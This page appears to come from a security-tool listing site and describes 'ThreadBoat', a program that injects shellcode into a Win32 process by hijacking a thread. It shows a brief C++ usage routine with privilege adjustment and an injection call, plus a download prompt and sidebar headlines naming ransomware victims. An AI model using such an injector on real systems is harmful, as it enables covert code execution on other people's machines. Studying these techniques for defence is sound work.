ThreadBoat – Program Uses Thread Execution Hijacking To Inject Native Shell-code Into A Standard Win32 Application

November 22, 2021

Program uses Thread

Usage

int main()
{
	System sys;
	Interceptor incp;
	Exception exp;

	sys.returnVersionState();
	if (sys.returnPrivilegeEscalationState())
	{
		std::cout << "Token Privileges Adjustedn";
	}

	if (DWORD m_procId = incp.FindWin32ProcessId((PCHAR)m_win32ProcessName))
	{
		incp.ExecuteWin32Shellcode(m_procId);
	}

	system("PAUSE");
	return 0;
}

For Further Information On Thread Execution Hijacking

Click On The Link Below

https://capec.mitre.org/data/definitions/30.html

Environment

  • Windows Vista+
  • Visual C++

Libs

  • Winapi

    • user32.dll
    • kernel32.dll

  • ntdll.dll

Ethical Notice

This code was simply written to demonstrate an overlooked method to inject shellcode or a DLL into a Win32 program. This code is not to be used for malicous purposes. The author, Josh Schiavone, is not liable for misuse of this software. May God bless you all.

Download ThreadBoat

If you like the site, please consider joining the telegram channel or supporting us on Patreon using the button below.

Discord

Original Source
Tags: , , , ,

You may have missed

Basta

Black Basta Ransomware Victim: doyon[.]com | doyondrilling[.]com

April 18, 2024
image 4

Akira Ransomware Victim: Serfilco, RP Adams, Baron Blakeslee, Pac er, Service Filtrati on of Canada, Polyma r[.]

April 18, 2024
cybersecurity

Attackers exploiting new critical OpenMetadata vulnerabilities on Kubernetes clusters

April 18, 2024
image 1

8 Base Ransomware Victim: YRW Limited – Chartered Accountants

April 18, 2024
image 1

8 Base Ransomware Victim: APS – Automotive Parts Solutions

April 18, 2024